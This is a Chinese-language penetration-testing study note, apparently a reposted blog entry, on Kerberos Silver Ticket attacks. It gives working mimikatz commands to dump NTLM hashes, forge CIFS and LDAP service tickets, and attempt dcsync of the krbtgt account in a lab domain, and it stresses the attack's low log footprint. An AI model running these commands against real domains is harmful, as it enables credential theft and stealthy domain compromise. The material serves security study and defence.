内网学习笔记 | 29、白银票据

Delina

原文链接：内网学习笔记 | 29、白银票据
​
0、前言白银票据（Sliver Ticket） 不同于黄金票据（Golden Ticket）

Kerberos 协议详解：https://teamssix.com/210923-151418.html

白银票据不与密钥分发中心 KDC 交互，因此没有了 Kerberos 认证协议里的前 4 步，通过伪造的票据授予服务 TGS 生成伪造的服务票据  ST 直接与服务器 Server 进行交互。
白银票据与黄金票据的区别：
1、白银票据不经过 KDC，因此白银票据日志相对于黄金票据会更少，同时白银票据的日志都在目标服务器上，域控上不会有日志
2、白银票据利用服务账户的哈希值，不同于黄金票据利用 krbtgt 账户的哈希值，因此白银票据更加隐蔽，但白银票据的权限就远不如黄金票据的权限了
想利用白银票据需要先知道以下信息：

•         域名
  
•         域 SID
  
•         目标服务器的 FQDN 即完整的域名
  
•         可利用的服务
  
•         服务账户的 NTLM 哈希
  
•         伪造的用户名即任意用户名
  
  

1、伪造 CIFS 服务权限CIFS 服务常用于 Windows 主机之间的文件共享，首先使用 mimikatz 获取服务账户的 NTLM 哈希，这里使用的 Username 为 DC$ 的 NTLM 哈希

• 
  

.\mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit
得到 HASH 后，清空当前系统中的票据，防止其他票据干扰
klist purge# 或者在 mimikatz 里清除kerberos::purge使用 mimikatz 生成伪造的白银票据

• 
  

.\mimikatz.exe "kerberos::golden /user:t /domain:teamssix.com /sid:S-1-5-21-284927032-1122706408-2778656994 /target:dc /rc4:ef9e49a41feaa171f642016fd4cb7e7a /service:cifs /ptt" exit

​

在伪造票据后，使用 dir 命令就能读取到目标的共享服务了。
2、伪造 LDAP 服务权限首先判断当前权限是否可以使用 dcsync 域控进行同步

• 
  

.\mimikatz.exe "lsadump::dcsync /dc:dc /domain:teamssix.com /user:krbtgt" exit
如果返回 ERROR 说明当前权限不能进行 dcsync 操作
接下来生成 LDAP 服务的白银票据

• 
  

.\mimikatz.exe "kerberos::golden /user:t /domain:teamssix.com /sid:S-1-5-21-284927032-1122706408-2778656994 /target:dc /rc4:ef9e49a41feaa171f642016fd4cb7e7a /service:ldap /ptt" exit

​

参考文章：
https://cloud.tencent.com/developer/article/1760135
https://shu1l.github.io/2020/06/ ... yu-bai-yin-piao-ju/
原文链接：
https://teamssix.com/211009-145524.html

​